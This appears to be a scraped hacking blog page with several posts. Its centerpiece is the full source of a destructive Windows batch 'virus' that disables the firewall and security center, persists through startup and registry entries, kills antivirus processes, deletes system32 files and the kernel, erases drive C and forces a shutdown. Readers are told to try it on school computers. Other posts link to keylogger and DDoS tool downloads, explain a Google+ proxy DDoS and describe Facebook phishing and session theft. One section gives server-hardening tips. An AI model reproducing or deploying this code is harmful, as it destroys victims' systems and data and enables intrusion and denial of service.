To check your computer is male or female (not Hacking)

Here is a funny coding to check your gender of your computer

Copy the coding to notepad

CreateObject("SAPI.SpVoice").Speak"I love you."

and save it in gender.vbs

double click on the file the pc will tell " I LOVE YOU "  check whether voice is male or female

And post comments on here :)

Verry very Dangerous Virus Program using Batch Programming (part 12)

EFFECT OF VIRUS 

>Copy itself for multiple times.

>This will disable the restore option by deleting the restore file. 

>This will disable the login option.

>If this affect the system, then the user can't use his OS longer

source code:

start
color 5
title Your Fucked, lol
time 12:00
net stop "Security center"
net stop sharedaccess
netsh firewall set opmode mode-disable
start
echo copy %0 >> c:\autoexec.bat
copy %0 c:\windows\startm~1\Programs\StartUp\shroom.bat
Attrib +r +h C:\windows\startm~1\program\startup\shroom.bat
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> c:\regstart.reg
echo "systemStart"="c:\filename\virus.bat" >> c:\regstart.reg
start c:\regstart.reg
copy %0 %systemroot%\shroom.bat > nul
start
copy %0 *.bat > nul
start
attrib +r +h virus.bat
attrib +r +h
RUNDLL32 USER32.DLL,SwapMouseButton
tskill msnmsgr
tskill Limewire
tskill iexplorer
tskill NMain
tskill Firefox
tskill explorer
tskill AVGUARD
msg * Awww Your computer is now fucked
msg * You got owned!
msg * Say Bye to your computer n00b
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
del "C:\WINDOWS\pchealth\"
del "C:\WINDOWS\system\"
del "C:\WINDOWS\system32\restore\"
del "C:\WINDOWS\system32\logonui.exe"
del "C:\WINDOWS\system32\ntoskrnl.exe"
del "Winlogon.exe"
ERASE c:
start
shutdown - s -t 15 -c "15 Seconds and counting"
cd %userprofile%\Desktop
copy fixvirus.bat %userprofile%\Desktop
echo HAXHAXHAX
:LOOP
color 17
color 28
color 32
color 22
color 11
color 02
color 39
color 34
GOTO LOOP

Copy this code into notepad and save as shroom.bat(while saving select all files instead of text files)

Warning: This is dangerous virus. So Handle it with careful. Don't try in your pc or friend pc. Just try in your school or college.

goto part -11 of .bat virus programming (click here)

Keylogger

Keyloggers capture and store all the keystokes which we typed in the system; modern keyloggers can capture system events&activities, screen shotes and clipbord  …..

Some of them can act as spy too , all the datas will be send to your mail id…..

Download from : http://1337x.org/torrent/47798/0/(use torrent client to download)

DDOS using GOOGLE PLUS servers

A security penetration tester at Italian security firm AIR Sicurezza Informatica has claimed that flaws exist in Google's servers that will allow would-be hackers to exploit the search giant's bandwidth and launch a distributed denial-of-service (DDoS) attack on a server of their choosing.

On the IHTeam Security Blog, Simone Quatrini, also known as R00T.ATI, demonstrates how users can make Google's servers act as a proxy to fetch content on their behalf. Quatrini has written a shell script that will repeatedly prompt Google's servers to make requests to a site of the attacker's choice, effectively using Google's bandwidth rather than their own. The advantage of using Google and make requests through their servers, is to be even more anonymous when you attack some site (TOR+This method); The funny thing is that apache will log Google IPs. But beware: gadgets/proxy? will send your ip in apache log, if you want to attack, you’ll need to use /_/sharebox/linkpreview/.

How does it work?
The vulnerable pages are “/_/sharebox/linkpreview/“ and “gadgets/proxy?“
Is possible to request any file type, and G+ will download and show all the content. So, if you parallelize so many requests, is possible to DDoS any site with Google bandwidth. Is also possible to start the attack without be logged in G+. If anything, Google will notice [attack attempts] and probably blacklist you.

 Download source code : http://www.ihteam.net/advisories/_154785695367_+ddos.sh


.

Hacking a Facebook Account using Facebook

 













Many of us know that phishing is also a trick to hack a facebook and session hijicking but hacker can do both at a same time. This vulnerability was happened on Facebook (static FBML) .Example here

 

What user will do ??
1. Checks for the URL.
2. Checks for which year the page was create.

Is it easy to fool the people?
Yes, by creating a new page in facebook in such way that user has to beliveness.

How its work??
1.Once the user clicks the link the session(cookies) where stolen by the hacker using That he can login any users account without a username and password
2. usually the users will check for the URL once it was known 1 they can enterning a userename and password.
3.After hitting the button Test your Password , Page will reflect a Thankyou Msg and it will popup with a paswd Rank 
4. Check ur email spam there must a email on this and it will say that ur password was wrong trying again 

Countermeasures:
1.Dont click a new link from a person u don’t know..
2.Facebook is not going to ask ur password is strong are not.
3.Some of the virus and worm (scam) was spreading in facebook applications.

share

Identify Countermeasures against Webserver Attacks

A web server administrator can do many things to harden a server (increase its security). The following are ways to increase the security of the web server:

Rename the administrator account, and use a strong password. To rename the administrator account in Windows, open the User Manager, right-click the Administrator account, and select Rename.

Disable default websites and FTP sites. The process to disable default websites was described earlier in this chapter: right-click the default website in IIS Manager and choose Stop. The same process works for the default FTP site.

Remove unused applications from the server, such as WebDAV. Unnecessary applications can be removed on a server by using Add/Remove Programs in the Windows Control Panel.

Disable directory browsing in the web server’s configuration settings.

Add a legal notice to the site to make potential attackers aware of the implications of hacking the site.

Apply the most current patches, hotfixes, and service packs to the operating system and web server software.

Perform bounds checking on input for web forms and query strings to prevent buffer overflow or malicious input attacks.

Disable remote administration.

Use a script to map unused file extensions to a 404 (“File not found”) error message.

Enable auditing and logging.

Use a firewall between the web server and the Internet and allow only necessary ports (such as 80 and 443) through the firewall.

Replace the GET method with the POST method when sending data to a web server.

Killapache: DDOS tool - Half of the Internet is vulnerable now !

 

How does killapache DDOS tool work?
killapache sends GET requests with multiple “byte ranges” that will claim large portions of the system’s memory space. A “byte range” statement allows a browser to only load certain parts of a document, for example bytes 500 to 1000. It is normally used while downloading large files. This method is used by programs such as download clients to resume downloads that have been interrupted; it is designed to reduce bandwidth requirements. However, it appears that stating multiple unsorted components in the header can cause an Apache server to malfunction.
There is no patch yet released for this vulnerability on apache, but a few work arounds have been found. These have been posted by The Apache Software Foundation and can be used until a stable fix is released.The vulnerability works by exploiting a feature in web servers that gives you the ability to pause and resume your downloads. These days if you have to stop downloading something part-way through you can generally pick up where you left off and you don't have to start again from scratch

Download the codings: http://pastebin.com/9y9Atijn